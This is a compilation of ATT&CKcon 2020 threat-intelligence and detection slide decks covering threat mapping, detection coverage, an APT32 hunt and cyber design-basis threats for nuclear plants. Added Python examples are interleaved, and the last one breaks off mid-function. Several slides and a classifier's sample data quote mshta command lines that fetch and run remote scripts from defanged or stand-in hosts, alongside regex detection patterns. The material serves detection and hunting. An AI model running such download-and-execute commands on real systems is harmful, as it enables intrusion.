Welcome
Join us on Slack
Valentina Palacín
THREAT MAPPING
CATALOGUE
TABLE OF CONTENTS
01
ABOUT ME
02
INSPIRATION
03
IDEA
04
EXPECTATIONS
05
REALITY
06
FUTURE
01 ABOUT ME
Valentina Palacín
@fierytermite
Translator
Threat Intelligence Analyst
Threat Hunter & Python Developer in progress
02 INSPIRATION
How was the idea born?
THREAT LIBRARY
Knowledge Base for
distilled and curated
intelligence insights
produced by CTI
Research Teams &
OSINT Sources.
How can I leverage something like this if I don't have a dedicated team?
03 IDEA
Threat Mapping Catalogue
WHAT IF…?
TMC
ATT&CK
04 EXPECTATIONS
Capabilities
MY
WISHLIST
● Load DB with ATT&CK content
● Use TRAM to load new relationships
● Manually add adversary mappings
● Create more relationships (industries,
dates, adversary types…)
● Explore relationships through GUI
● Edit selected data through GUI
● Edit relationships through GUI
● Export data to ATT&CK Navigator
● Dockerize everything for easy deployment
But… 2020
WHY DID I DO
THIS TO MYSELF?
05 REALITY
Capabilities
SO FAR…
● Load DB with ATT&CK content
● Use TRAM to load new relationships
● Manually add adversary mappings
● Create more relationships (industries,
dates, adversary types…)
● Explore relationships through GUI
● Edit selected data through GUI
● Edit relationships through GUI
● Export data to ATT&CK Navigator
● Dockerize everything for easy deployment
/first-time
git clone https://github.com/fierytermite/attack-navigator
git clone --branch tmc https://github.com/fierytermite/tram-1
git clone https://github.com/intelforge/tmc
* Register and log in with the new user
FIRST…
1.3H
localhost:4200/fetch/http:%2F%2Flocalhost:5000%2Fstatic%2Fexport%2Fadversary_1_60ba8984-3b68-11eb-834e-080027bab013.json
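The "Export data to ATT&CK Navigator" capability comes down to emitting a layer JSON that Navigator can open, which is what the /fetch/ URL above loads. The following is an added example of that step, written for this page and not taken from TMC's code: it turns a constructed adversary-to-technique mapping set into a Navigator layer (public layer format, version 4.x; the ATT&CK and Navigator version strings are assumptions) and scores each technique by how many reports mapped it.

```python
"""Build an ATT&CK Navigator layer from adversary-to-technique mappings.

Added example, not TMC's own export code. SAMPLE_MAPPINGS is constructed
(adversary name -> technique IDs, one entry per report that mentions it);
the output follows the public Navigator layer JSON format, version 4.x.
"""
import json
from collections import Counter


# Constructed sample data standing in for TMC's database.
SAMPLE_MAPPINGS = {
    "adversary_1": ["T1218.005", "T1059.005", "T1566.001", "T1218.005"],
    "adversary_2": ["T1218.005", "T1021.001"],
}


def count_techniques(reports):
    """{technique_id: how many reports mapped it}."""
    return Counter(reports)


def build_layer(name, reports, domain="enterprise-attack",
                attack_version="8", navigator_version="4.1"):
    """Return a Navigator layer dict. score = report count, so the heatmap
    shows which techniques the adversary is most often reported using."""
    counts = count_techniques(reports)
    techniques = [
        {
            "techniqueID": tid,   # sub-technique IDs (T1218.005) are accepted as-is
            "score": n,
            "comment": f"{n} mapping(s) in TMC for {name}",
        }
        for tid, n in sorted(counts.items())
    ]
    return {
        "name": f"TMC export: {name}",
        "versions": {"attack": attack_version,
                     "navigator": navigator_version,
                     "layer": "4.1"},
        "domain": domain,
        "description": "Generated from Threat Mapping Catalogue adversary mappings",
        "techniques": techniques,
        # white -> red gradient over the observed score range
        "gradient": {"colors": ["#ffffff", "#ff6666"],
                     "minValue": 0,
                     "maxValue": max(counts.values(), default=1)},
    }


def export_layer(name, reports, path):
    """Write the layer to disk. Navigator opens it via Open Existing Layer, or
    via its /fetch/<url> route when the file is served over HTTP."""
    layer = build_layer(name, reports)
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(layer, fh, indent=2)
    return layer


if __name__ == "__main__":
    for adversary, reports in SAMPLE_MAPPINGS.items():
        export_layer(adversary, reports, f"{adversary}.json")
        print(f"wrote {adversary}.json")
```

Navigator renders the score through the gradient, so a technique mapped twice comes out darker than one mapped once; set maxValue from the data, not a constant, or a single heavily reported technique flattens the rest of the layer.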
06 FUTURE
Capabilities
GOALS
● Create more relationships (dates,
adversary types…)
● Manually load new mapping
● Edit relationships through UI
● Dockerize everything for easy
deployment
● Add relational graphs to study the
adversaries
BUT
FOR NOW…
CREDITS: This presentation template was
created by Slidesgo, including icons by
Flaticon, and infographics& images by
Freepik.
THANKS!
Please keep this slide for attribution.
Do you have any questions?
@fierytermite
linkedin.com/in/valentinapalacin
From Theory to Practice:
How My ATT&CKⓇ
Perspectives Have Changed
Katie Nickels
ATT&CKcon Power Hour
December 11, 2020
Yes, this is being
recorded. Yes, the slides
will be shared. No, I don’t
know when. Soon.
§ Former MITRE ATT&CK Team Member (relevant)
§ SANS Certified Instructor for FOR578:
Cyber Threat Intelligence
§ Bringing context about threats to inform decisions
§ Maintaining sanity with exercise, chocolate, containers, and holiday lights
Katie Nickels
DIRECTOR OF INTELLIGENCE
RED CANARY
@LiketheCoins
About Me
Different
perspectives
help you think
differently
1. Tracking tactics, techniques, and procedures
2. Defining detection coverage
3. Choosing what to detect
How I've thought differently about ATT&CK
Thinking through TTPs
Tracking TTPs the MITRE way
https://attack.mitre.org/techniques/T1218/005/
Tactic: Defense Evasion
Technique/Sub-technique: Signed Binary Proxy Execution: Mshta
Procedure: Koadic can use MSHTA to serve additional payloads.[13]
A Koadic detection at Red Canary
Procedure...
So what’s this?
Tactics
Techniques/Sub-techniques
Procedures
Observables
We want to track things beyond TTPs
Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Koadic used VBScript to launch mshta.exe and make an
external network connection
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
Example of tracking beyond TTPs
Primary Tactic: Execution
Additional Tactics
Techniques
Procedure ★
Observable
Koadic uses VBScript to launch mshta.exe and make an external network connection.
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors
Name | Targeted to this profile?
WIN-MSHTA-CLI-URL | No
WIN-MSHTA-NON-HTA | No
WIN-MSHTA-INLINE-VBSCRIPT | No
TA0005 Defense Evasion
T1218.005 Signed Binary Proxy Execution: Mshta
T1059.005 Command and Scripting Interpreter: Visual Basic
What this format lets us do
§ Track detailed observables from endpoint telemetry
§ Identify where we have detection coverage (or not)
§ Use ATT&CK tactics, techniques, and sub-techniques
...but add on because it meets our needs
Defining detection coverage
Defining coverage by confidence
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
The challenge of unlimited procedures
“You should also remember that each ATT&CK technique may
have many procedures for how an adversary could implement
it — and because adversaries are always changing, we can’t
know what all those procedures are in advance.”
https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
Katie: “There are unlimited procedures!”
§ Matt: “But are there?”
o Think of techniques like MSHTA
o Commands only have so many flags
§ We may be able to scope some technique variations
Defining detection
coverage by variations
Tactics
Techniques/Sub-techniques
Variations
Procedures
Observables
Tactics
Techniques/Sub-techniques
Adding in variations
Variations are specific options
made available to an attacker as
defined by the technical
components involved that
comprise a technique
(working definition)
Nine known variations for HTA
1. HTA can have any file name and extension
2. Specifying a URI from where HTA content is first downloaded
3. Use of scripting engines
4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”)
5. HTA content embedded and executed from within other file formats
6. HTA content can be executed remotely via UNC paths.
7. Remote HTA execution via COM interface (lateral movement)
8. HTA execution by double clicking or invoking with “explorer.exe foo.hta”
9. Full control over the path and filename of mshta.exe and rundll32.exe
https://redcanary.com/blog/threat-research-questions
Adding in variations
Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Specifying protocol handler + direct download from URI
Koadic used VBScript to launch mshta.exe and make an
external network connection
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
Mix and match the variations
Specifying
protocol handler
vbscript:
Direct download from URI
mshta hxxp[:]//8.8.8[.]8:123/
Specifying
protocol handler
jscript:
https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
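The variation list and the mix-and-match slide above describe mshta in terms of options an attacker can combine: protocol handler, download from a URI, non-.hta file name, UNC path. The following is an added example, not Red Canary's detector code, that classifies constructed mshta process-creation records by those variations and reports which of the three detector names from the profile slide each would hit. The detector names are from the slide; what each one matches is my reading of the name, and the sample events use a TEST-NET address in place of the slide's redacted one.

```python
"""Classify mshta.exe command lines by the HTA variations listed above, and
report which of the three detector names from the slide each line would hit.

Added example, not Red Canary's detector code. The detector names
(WIN-MSHTA-CLI-URL, WIN-MSHTA-NON-HTA, WIN-MSHTA-INLINE-VBSCRIPT) come from
the slide; the matching logic is my reading of what each name implies.
SAMPLE_EVENTS are constructed (image path, command line) process-creation
records.
"""
import re

SAMPLE_EVENTS = [
    ("C:\\Windows\\system32\\mshta.EXE",
     'mshta vbscript:CreateObject("WScript.Shell").run("mshta http://192.0.2.10:123/12qwert",0)(window.close)'),
    ("C:\\Windows\\system32\\mshta.exe", "mshta.exe http://c2.example.invalid/payload.hta"),
    ("C:\\Windows\\system32\\mshta.exe",
     'mshta javascript:a=GetObject("script:http://c2.example.invalid/x.sct").Exec();close();'),
    ("C:\\Windows\\system32\\mshta.exe", "mshta.exe C:\\Users\\alice\\Downloads\\report.hta"),
    ("C:\\Windows\\system32\\mshta.exe", "mshta.exe C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.txt"),
    ("C:\\Windows\\system32\\mshta.exe", "mshta.exe \\\\fileserver\\share\\tool.hta"),
    ("C:\\Windows\\system32\\notepad.exe", "notepad.exe mshta.hta"),
]

PROTOCOL_HANDLER = re.compile(r"^(vbscript|javascript|jscript|about):", re.I)  # variation 4
URL = re.compile(r"https?://", re.I)                                            # variation 2
UNC = re.compile(r"^\\\\[^\\]+\\")                                              # variation 6


def classify(cmdline):
    """Return the set of variation labels and detector names for one command line."""
    args = cmdline.split()[1:]           # drop the mshta image token itself
    target = args[0] if args else ""
    labels = set()
    handler = PROTOCOL_HANDLER.match(target)
    if handler:
        labels.add(f"protocol_handler:{handler.group(1).lower()}")
        if handler.group(1).lower() == "vbscript":
            labels.add("WIN-MSHTA-INLINE-VBSCRIPT")
    if URL.search(cmdline):
        labels.update({"direct_download_from_uri", "WIN-MSHTA-CLI-URL"})
    if UNC.match(target):
        labels.add("unc_path")
    # variation 1: any file name/extension; flag a local/UNC target that is not *.hta
    if target and not handler and not URL.match(target) and not target.lower().endswith(".hta"):
        labels.update({"non_hta_extension", "WIN-MSHTA-NON-HTA"})
    if not labels:
        labels.add("local_hta_file")     # plain .hta on disk: no detector from the slide fires
    return labels


def triage(events):
    """[(cmdline, labels)] for events whose image is mshta.exe."""
    return [(cmd, classify(cmd)) for image, cmd in events
            if image.lower().endswith("\\mshta.exe")]


def detector_hits(events, detectors=("WIN-MSHTA-CLI-URL", "WIN-MSHTA-NON-HTA",
                                     "WIN-MSHTA-INLINE-VBSCRIPT")):
    """Per-detector hit counts plus the command lines none of the slide's detectors catch."""
    results = triage(events)
    hits = {d: sum(d in labels for _, labels in results) for d in detectors}
    uncaught = [cmd for cmd, labels in results if not labels & set(detectors)]
    return hits, uncaught
```

Two of the six mshta lines (a plain local .hta and a UNC-path .hta) hit none of the three detector names, which is exactly the coverage gap the variations view is meant to expose: a technique-level "covered" tick for T1218.005 would hide it.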
Testing known variation combinations
T1218.005 Signed Binary Proxy Execution: Mshta
More granular: 25 tested combinations  <->  Less granular: 1 technique
Defining detection
coverage by threat
observables
Remember that profile breakdown?
Techniques
Observable
Koadic uses VBScript to launch mshta.exe and make an external network connection.
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors
Name | Targeted to this profile?
WIN-MSHTA-CLI-URL | No
WIN-MSHTA-NON-HTA | No
WIN-MSHTA-INLINE-VBSCRIPT | No
T1218.005 Signed Binary Proxy Execution: Mshta
T1059.005 Command and Scripting Interpreter: Visual Basic
Mapping coverage based on threats
Koadic observable 1
Koadic observable 2
FIN7 observable 1
FIN7 observable 2
Kovter observable 1
Lazarus observable 1
More granular: 6 threat observables for Mshta  <->  Less granular: 1 technique (T1218.005 Signed Binary Proxy Execution: Mshta)
So how should we
explain detection
coverage?
Explaining to leadership
This is okay!
Koadic observable 1
Koadic observable 2
FIN7 observable 1
FIN7 observable 2
Lazarus observable 1
Diving deeper
These are okay too!
HTA test harness results | Mshta threat observables
Expressing coverage is just tough
§ Any way you express it will have limitations
§ There’s no “right” or “wrong” way to do it
...but there may be “better” ways for your needs
§ Figure out the requirement for what you’re doing
o What are you trying to convey and achieve?
o What’s your goal of expressing the coverage?
Choosing what to detect
§ Not everything is useful for detection
§ Choosing is most of the battle
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
Finding “good” detection opportunities
§ “Discovery techniques aren’t that useful for detection”
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
Discovery techniques
§ “...except when they are”
Domain Trust Discovery with nltest
§ “This should NEVER happen in an environment, let’s write a
detection analytic!” —Me in January 2020
§ “Here’s a hypothesis that will probably be noisy so here are five
ways to tune it when that happens.” —Me in December 2020
§ If an analytic is noisy…how can we tune it?
o Narrow it down? Use threat intelligence.
o Easily suppress on false positives?
Testing & tuning is most of the work
https://redcanary.com/blog/tuning-detectors/
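The nltest example above is a hypothesis that starts broad and gets tuned as it fires. The following is an added example, not Red Canary's analytic, of what those tuning knobs look like in code: the base hypothesis matches nltest trust and DC discovery switches, an allowlist suppresses documented operators and hosts, a baseline of (host, user) pairs that ran it before the hunt window suppresses recurring activity, and a threat-intel list of suspicious parent processes narrows the rest to high severity. Events and field names are constructed.

```python
"""A deliberately broad hunting analytic (nltest domain trust discovery) with
tuning knobs: suppress known false positives, baseline who normally runs it,
and narrow with threat intelligence.

Added example, not Red Canary's detector. Events are constructed; the field
names (host, user, parent, cmdline) are my own.
"""
import re
from dataclasses import dataclass, field

# Base hypothesis: nltest used for trust / domain controller discovery.
NLTEST_DISCOVERY = re.compile(
    r"\bnltest(\.exe)?\b.*?/(domain_trusts|all_trusts|dclist|dsgetdc)", re.I)


@dataclass
class Event:
    host: str
    user: str
    parent: str
    cmdline: str


@dataclass
class Tuning:
    # knob 1: documented operators and hosts (false positives you decided to accept)
    allowed_users: set = field(default_factory=set)
    allowed_hosts: set = field(default_factory=set)
    # knob 2: (host, user) pairs that ran this before the hunt window
    baseline: set = field(default_factory=set)
    # knob 3: parents threat intel says precede this in real intrusions
    suspicious_parents: set = field(default_factory=set)


SAMPLE_EVENTS = [
    Event("JUMP01", "corp\\admin1", "cmd.exe", "nltest /domain_trusts /all_trusts"),
    Event("MON01", "corp\\svc_monitor", "agent.exe", "nltest.exe /dclist:corp"),
    Event("WS042", "corp\\alice", "winword.exe", "nltest /domain_trusts"),
    Event("WS101", "corp\\bob", "cmd.exe", "nltest /dsgetdc:corp"),
    Event("WS200", "corp\\carol", "explorer.exe", "ping 10.0.0.1"),
]

TUNING = Tuning(
    allowed_hosts={"jump01"},
    baseline={("mon01", "corp\\svc_monitor")},
    suspicious_parents={"winword.exe", "excel.exe", "powershell.exe"},
)


def matches(ev):
    """The untuned hypothesis."""
    return bool(NLTEST_DISCOVERY.search(ev.cmdline))


def evaluate(events, tuning):
    """Return (alerts, suppressed): alerts = [(event, severity)],
    suppressed = [(event, reason)] so tuning decisions stay auditable."""
    alerts, suppressed = [], []
    for ev in events:
        if not matches(ev):
            continue
        host, user = ev.host.lower(), ev.user.lower()
        if user in tuning.allowed_users or host in tuning.allowed_hosts:
            suppressed.append((ev, "allowlisted operator/host"))
        elif (host, user) in tuning.baseline:
            suppressed.append((ev, "seen in baseline"))
        else:
            severity = "high" if ev.parent.lower() in tuning.suspicious_parents else "medium"
            alerts.append((ev, severity))
    return alerts, suppressed


if __name__ == "__main__":
    raw, _ = evaluate(SAMPLE_EVENTS, Tuning())
    tuned, dropped = evaluate(SAMPLE_EVENTS, TUNING)
    print(f"untuned: {len(raw)} alerts; tuned: {len(tuned)} alerts, {len(dropped)} suppressed")
    for ev, sev in tuned:
        print(sev, ev.host, ev.user, ev.parent, "->", ev.cmdline)
```

Keeping the suppressed list, with a reason per event, is the part that pays off later: when a suppressed host or account is compromised, the analyst can see what the analytic would have said and why it stayed quiet.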
In closing
Takeaways
§ Don’t limit yourself to just TTPs if you need to go further
§ Define detection coverage based on your requirements
§ Trial, error, and experience will help you choose what to detect
§ It’s a good thing to change your perspectives
§ Surrounding yourself with new people and new situations lets
you think differently and mature
Thank you!
Katie Nickels
@RedCanary
@LiketheCoins
https://redcanary.com/blog/
Sharpening your Threat Hunting
Program with ATT&CK Framework
Hieu Tran
Detection Team Lead | FPT Cybersecurity Division
INDEX
Sharpening your Threat Hunting Program with ATT&CK framework
01 Threat Hunting vs Threat Detection
02 Threat Hunting Methodology
03 MITRE ATT&CK - Threat Hunter Common Language
04 Case study
05 Key takeaways
06 Q&A
Human-driven (and assisted
by tools) practice of
searching iteratively
through data to detect
advanced threats that evade
traditional security controls
Threat Hunting vs Threat Detection

Threat Hunting
DEFINITION
• Proactive
• Humans find bad stuff with the help of machines
PROs
• Identifies detection gaps and drives the creation of new detections
CONs
• Needs security experts for searching, hunting, etc.
• Slow and expensive

Threat Detection
DEFINITION
• Reactive
• Automated with machines such as SIEM, IDS/IPS, AV, etc.
PROs
• Least expensive approach
CONs
• Likely to miss something (false negatives)
• Too much time spent because of alert fatigue (false positives)
What are we looking for?
NUMBERS TELL STORIES:
GLOBAL DWELL TIME
It takes so long to detect
bad guys inside your
organization.
FireEye Mandiant M-Trends 2020 Special Report
Threat Hunting Methodology
1. Target: Scope the data sets that will be used in your investigation. Hunts can branch from various starting points.
2. Hunt: Proactively and iteratively search through network and endpoint data to detect and isolate advanced threats that evade more traditional security solutions.
3. Disrupt: Seamlessly pivot from hunting to forensic analysis, in order to disrupt adversaries before they fully execute their attacks. These analyses can also generate new indicators that can be fed into complementary security systems, creating a valuable security feedback loop.
MITRE ATT&CK - Threat
Hunter Common
Language
Case Study: APT32
Threat Hunting and Incident Response against Cyber Espionage
Threat Actors: APT32 – OceanLotus/SeaLotus/CobaltKitty
Our customer's situation at the time:
• Large enterprise with a huge number of endpoints: ~1000 servers, 6000 workstations.
• Core services (Active Directory, email server, antivirus management) already compromised.
• Operations and security staff machines were compromised.
IT IS CHAOS
https://twitter.com/ItsReallyNick/status/915800233455575040
Based on what we found on compromised servers/workstations, we built our hypothesis:
• Initial Access via spear phishing to obtain valid (administrator) accounts.
• Execution of malicious payloads with living-off-the-land binary (LOLBIN) techniques.
• Persistence by installing a new service or setting registry run keys.
• Defense Evasion (staying under the radar) via software packing, DLL hijacking, file deletion, etc.
• Discovery via network service scanning and brute forcing using custom malware/scripts.
• C2 communication over commonly used ports (80, 443, 53).
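The last item of the hypothesis, C2 over ports everyone uses, rules out port-based hunting and leaves prevalence: a C2 destination is contacted by few hosts and is usually new, which matches the "never seen before" domains reported later in the case study. The following is an added example, not FPT's hunting tooling, of a least-frequency (stacking) pass over constructed proxy-style log lines: it counts distinct source hosts per destination on ports 80/443/53, drops destinations already vetted in earlier hunts, ranks the long tail, and then checks a candidate for evenly spaced connections from one host, a common trait of automated check-ins.

```python
"""Stacking (least-frequency) hunt for candidate C2 over proxy-style logs,
following the case-study hypothesis that C2 rides on common ports.

Added example, not FPT's hunting code. SAMPLE_LOG is constructed:
timestamp, source host, destination port, destination domain.
"""
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
2020-12-01T08:00:01 ws001 443 updates.example.com
2020-12-01T08:00:03 ws002 443 updates.example.com
2020-12-01T08:00:05 ws003 443 updates.example.com
2020-12-01T08:01:10 ws001 80 cdn.example.net
2020-12-01T08:01:12 ws004 80 cdn.example.net
2020-12-01T08:02:00 ws017 443 sync-files.example.org
2020-12-01T08:02:30 ws017 443 sync-files.example.org
2020-12-01T08:03:00 ws017 443 sync-files.example.org
2020-12-01T08:05:00 srv03 53 t.dns-relay.example.org
2020-12-01T08:06:00 ws009 8443 portal.example.com
2020-12-01T08:07:00 ws022 443 sync-files.example.org
"""

COMMON_PORTS = {80, 443, 53}
# Destinations vetted in earlier hunts (constructed). Anything not in here is
# "never seen before" from the hunt team's point of view.
KNOWN_GOOD = {"updates.example.com", "cdn.example.net"}


def parse(log):
    rows = []
    for line in log.splitlines():
        ts, host, port, dst = line.split()
        rows.append((ts, host, int(port), dst.lower()))
    return rows


def stack_destinations(rows, ports=COMMON_PORTS):
    """{dst: {"hosts": set, "hits": n, "ports": set}} restricted to common ports."""
    stats = defaultdict(lambda: {"hosts": set(), "hits": 0, "ports": set()})
    for _, host, port, dst in rows:
        if port in ports:
            s = stats[dst]
            s["hosts"].add(host)
            s["hits"] += 1
            s["ports"].add(port)
    return stats


def rare_destinations(stats, max_hosts=2, known_good=KNOWN_GOOD):
    """Long-tail candidates: contacted by few hosts and not previously vetted,
    rarest first (fewest hosts, then most hits, then name)."""
    cands = []
    for dst, s in stats.items():
        if dst in known_good or len(s["hosts"]) > max_hosts:
            continue
        cands.append({"dst": dst, "hosts": sorted(s["hosts"]),
                      "hits": s["hits"], "ports": sorted(s["ports"])})
    cands.sort(key=lambda c: (len(c["hosts"]), -c["hits"], c["dst"]))
    return cands


def beaconing_hosts(rows, dst, min_events=3, max_jitter=0.2):
    """Hosts whose connections to dst are evenly spaced (interval spread
    within max_jitter of the mean interval)."""
    times = defaultdict(list)
    for ts, host, _, d in rows:
        if d == dst:
            times[host].append(datetime.fromisoformat(ts))
    flagged = []
    for host, stamps in times.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = sum(gaps) / len(gaps)
        if mean > 0 and (max(gaps) - min(gaps)) / mean <= max_jitter:
            flagged.append(host)
    return sorted(flagged)


if __name__ == "__main__":
    rows = parse(SAMPLE_LOG)
    for c in rare_destinations(stack_destinations(rows)):
        print(c["dst"], c["hosts"], c["hits"], c["ports"],
              "beaconing:", beaconing_hosts(rows, c["dst"]))
```

The host list attached to each candidate is the pivot the case study's automation step needs: it is the set of endpoints to isolate and to pull artifacts from once the destination is confirmed as C2.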
Case Study: APT32
https://gist.githubusercontent.com/itsreallynick/2bd73f54d643fe4553d413e71b3893cc/raw/06c7c7012b17b890ffb8f5029d5f367c9a7122ee/pok%25C3%25A9.txt
Case Study #1
We deployed independent hunting stacks:
• Endpoint Detection & Response
• Datalake (Gathering all essentials service logs, including: DNS, Proxy, AD…)
• Advanced Threat Detection
• Network Detection & Response
Automate lots of work by leveraging the tools' open APIs:
• Quickly deploy data acquisition scripts across the enterprise infrastructure.
• Prevent active C2 connections with endpoint isolation and binary isolation.
• Speed up cleanup of malware artifacts (remove binary files, executable files and registry run keys).
Case Study #1
At the end of the day, we discovered:
• 13 C2 domains and 12 C2 IPs:
  • 04 C2 domains had never been seen before.
• 26 servers and 96 clients were compromised.
• 09 user SIDs were used to install malicious services.
• Multiple malware artifacts, which could be divided into the following groups:
  • Binary files (.exe and .dll files)
  • Scripts (PowerShell, C#, JScript, .NET)
  • Webshells (PHP scripts)
  • C2 payloads (found in the registry)
We will be able to hunt at scale with:
The right staff with the right skillsets
The right processes/procedures for hunting
The right technical solutions that enable hunters
Key Takeaways
1. Assume-breach mindset.
2. Train your staff in threat hunter skillsets (or outsource).
3. Build a roadmap for implementing solutions properly.
THANK YOU. QUESTIONS?
HieuTT35@fpt.com.vn
Twitter: @HieuTra34558978
USING ATT&CK TO CREATE CYBER DBTS
DR. JACOB BENJAMIN
PREVIOUS ICS EXPERIENCE
+ Idaho National Laboratory
+ Areva NP
+ Duke Energy
ABOUT THE PRESENTER
JACOB BENJAMIN – DIRECTOR OF PROFESSIONAL SERVICES
RESEARCH AREAS
+ Nuclear Cybersecurity
+ Cyber Risk Management
+ Wireless Security
+ Software-Defined Networking
+ Malware Analysis
+ Steganography Detection
CREDENTIALS
+ Ph.D., Computer Science
+ M.S., Cybersecurity
+ B.S., Computer Science
+ CISSP
+ What is a DBT?
+ How are they
developed?
+ What does a DBT look
like?
+ Are there cyber DBTs?
DESIGN BASIS THREAT (DBT)
OVERVIEW
“ATTEMPT OF THEFT OF A SIGNIFICANT AMOUNT OF
NUCLEAR MATERIAL (E.G. 10KG OF PU) BY A GROUP OF
6 OUTSIDERS EQUIPPED WITH 10 KG TNT EXPLOSIVE,
AUTOMATIC WEAPONS (INCLUDING LIGHT INFANTRY
WEAPONS) AND SPECIFIC COMMERCIALLY AVAILABLE
INTRUSION TOOLS. THEY HAVE A COMPREHENSIVE
KNOWLEDGE OF THE FACILITY AND ASSOCIATED
PHYSICAL PROTECTION MEASURES. WILLING TO DIE
OR TO KILL. NO COLLUSION WITH INSIDER.”
IAEA DBT WORKSHOP
EXAMPLE DBT
SENSING OPPORTUNITIES
RESPONSE TIME VS ADVERSARY TASK TIME
[Figure: timeline from T0 (adversary begins task) through first sensing, TD (adversary detected; detection time) and Ti (adversary interrupted; response force time) to Tc (adversary completes task). Bars shown: adversary task time, adversary task time remaining after first sensing, PPS response time, and time remaining after interruption.]
CYBER SECURITY
FOR NUCLEAR POWER PLANTS
KEY DOCUMENTS
• NEI 04-04, Voluntary Cyber Program
• 10 CFR 73.54, The Cyber Rule
• NEI 08-09, Cyber Security Plan
• NEI 13-10, Cyber Security Assessments
CHALLENGES
• Describing the cyber threat landscape
• Modeling cyber-initiated events
• Mal-operation vs malware
USING ATT&CK
• Describe threat behavior
• Conduct adversary emulation
• Evaluate actual events & case studies
Cybersecurity risk mitigation for
nuclear power plants began in
2002 and 2003, when the NRC
included cybersecurity
requirements in the Physical
Security and Design Basis Threat
Orders.
USING TRADITIONAL DBT
ANALYSIS FOR CYBER
PAST CYBER EVENTS
Nuclear sector
Energy sector
ICS overall
CREDIBLE THREAT INTELLIGENCE
Dragos World View Bulletins
CISA / ICS-CERT
Vendors
SITE SPECIFIC TARGETS
Crown Jewel Analysis
Consequence-based targeting
EXAMPLE CYBER DBT DEVELOPMENT
• Targets: SIS, turbines, generators
• Past events: CrashOverride, Trisis, Stuxnet
• Threat intel: World View, CISA, vendors
ATTEMPT TO CAUSE A LOSS OF SAFETY IMPACT.
ADVERSARY HAS BEEN KNOWN TO USE DRIVE-BY
COMPROMISE, EXTERNAL REMOTE SERVICES, VALID
ACCOUNTS, SUPPLY CHAIN COMPROMISE, AND ICS-
TAILORED MALWARE. THEY HAVE DESTRUCTIVE
CAPABILITIES, UNDERSTAND PROCESS IMPLICATIONS,
AND HAVE SPECIFIC KNOWLEDGE OF INDUSTRIAL
CONTROL SYSTEMS. WILLING TO CAUSE PHYSICAL
HARM OR KILL. NO COLLUSION WITH INSIDER.
CYBER DBT
RESULT
TTP | Name | Mitigations
T0822 | External Remote Services | M1042, M1035, M1032, M1030
T0859 | Valid Accounts | M1047, M1037, M1032, M1027, M1026, M1018
T0817 | Drive-by Compromise | M1021
T0862 | Supply Chain Compromise | M1049, M1016
S0013 | Trisis | M1049, M1035, M1040, M1038, M1030
LEVERAGING CYBER DBTS
ASSESSING MITIGATION COVERAGE
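Once the DBT is expressed as ATT&CK for ICS TTPs with mapped mitigations, as in the table above, mitigation coverage becomes a set problem: which DBT behaviours have at least one implemented mitigation, and which missing mitigation closes the most gaps. The following is an added example, not Dragos tooling, that takes the table as transcribed from the slide, a constructed set of mitigations the site has in place, and reports per-TTP coverage plus a greedy ranking of what to add next. The mitigation names are the three the slide spells out; everything else is an assumption for illustration.

```python
"""Mitigation-coverage assessment for the cyber DBT above: per-TTP coverage
given the mitigations a site has implemented, the DBT TTPs with no
implemented mitigation at all, and a greedy ranking of which missing
mitigations close the most gaps.

Added example, not Dragos tooling. DBT_TTPS transcribes the table above;
IMPLEMENTED is constructed for illustration.
"""

DBT_TTPS = {
    "T0822 External Remote Services": ["M1042", "M1035", "M1032", "M1030"],
    "T0859 Valid Accounts": ["M1047", "M1037", "M1032", "M1027", "M1026", "M1018"],
    "T0817 Drive-by Compromise": ["M1021"],
    "T0862 Supply Chain Compromise": ["M1049", "M1016"],
    "S0013 Trisis": ["M1049", "M1035", "M1040", "M1038", "M1030"],
}

# Constructed: the site has only network segmentation in place.
IMPLEMENTED = {"M1030"}

MITIGATION_NAMES = {  # names the slide spells out; other IDs are left blank
    "M1032": "Multi-factor Authentication",
    "M1049": "Antivirus / Antimalware",
    "M1021": "Restrict Web-Based Content",
}


def ttp_coverage(dbt, implemented):
    """Fraction of each TTP's mapped mitigations that are implemented."""
    impl = set(implemented)
    return {ttp: len(set(ms) & impl) / len(ms) for ttp, ms in dbt.items()}


def uncovered(dbt, implemented):
    """DBT TTPs with no implemented mitigation at all."""
    impl = set(implemented)
    return [ttp for ttp, ms in dbt.items() if not set(ms) & impl]


def rank_gaps(dbt, implemented):
    """Greedy set cover: repeatedly pick the unimplemented mitigation that
    newly covers the most uncovered TTPs (ties: broader mapping across the
    DBT, then lowest ID). Returns [(mitigation_id, [ttps it newly covers])]
    until every DBT TTP has at least one mitigation."""
    impl = set(implemented)
    plan = []
    while True:
        todo = uncovered(dbt, impl)
        if not todo:
            return plan
        gain = {}
        for ttp in todo:
            for m in dbt[ttp]:
                if m not in impl:
                    gain.setdefault(m, set()).add(ttp)
        breadth = {m: sum(m in ms for ms in dbt.values()) for m in gain}
        best = min(gain, key=lambda m: (-len(gain[m]), -breadth[m], m))
        plan.append((best, sorted(gain[best])))
        impl.add(best)


def report(dbt=DBT_TTPS, implemented=IMPLEMENTED):
    lines = [f"{ttp}: {cov:.0%} of mapped mitigations implemented"
             for ttp, cov in ttp_coverage(dbt, implemented).items()]
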